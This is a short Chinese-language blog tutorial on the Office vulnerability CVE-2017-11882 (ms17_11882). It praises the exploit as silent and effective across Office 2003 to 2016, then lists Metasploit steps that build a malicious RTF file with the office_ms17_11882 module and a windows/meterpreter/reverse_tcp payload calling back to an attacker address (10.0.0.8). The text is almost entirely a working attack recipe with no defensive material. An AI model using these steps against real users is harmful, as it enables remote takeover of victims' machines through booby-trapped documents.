ms17_11882漏洞

1746人浏览 / 0人评论

一、漏洞简介

2017年11月14号,微软推送了常规的安全更新,其中,关于CVE-2017-11882的安全更新引起了圈里的关注,随之而来的,便是针对此漏洞的POC攻击代码被逐渐公开。各路大神在Twitter和Github上相继公布自己的POC及对应的漏洞利用姿势,将这股烈火蔓延到2018年。

从漏洞利用效果来看,它可以通杀Office 2003到2016的所有版本,并且整个攻击环境的构建非常简单,姿势又非常“优雅”。例如,有些攻击效果会出现弹框,会出现CPU飙高,会发生异常等等,而这个漏洞的利用效果,堪称“无色无味”。在后续实验过程中,大家可以自行体会。

二、漏洞复现

1、进入mfs

msfconsole   

2 、搜索漏洞

search rtf   

3、进入漏洞模块

use exploit/windows/fileformat/office_ms17_11882  

4、设置文件名

set FiLENAME liangzeyu2.rtf  设置文件名

5、设置攻击者ip

set SRVHOST 10.0.0.8  设置攻击者ip

6、 配置反向代理

set payload windows/meterpreter/reverse_tcp

7、设置攻击者ip


set LHOST 10.0.0.8  配置攻击者ip

8、运行

run    

 

全部评论